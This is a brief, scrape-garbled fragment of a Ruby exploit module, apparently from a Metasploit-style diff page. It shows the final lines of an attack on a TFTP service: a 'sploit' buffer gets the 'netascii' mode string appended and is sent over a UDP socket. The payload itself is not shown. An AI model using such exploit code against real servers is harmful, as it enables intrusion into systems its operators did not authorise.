sploit << "\x00" + "netascii" + "\x00"
|
||||
|
||||
|
||||
udp_sock.put(sploit)
|
||||
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue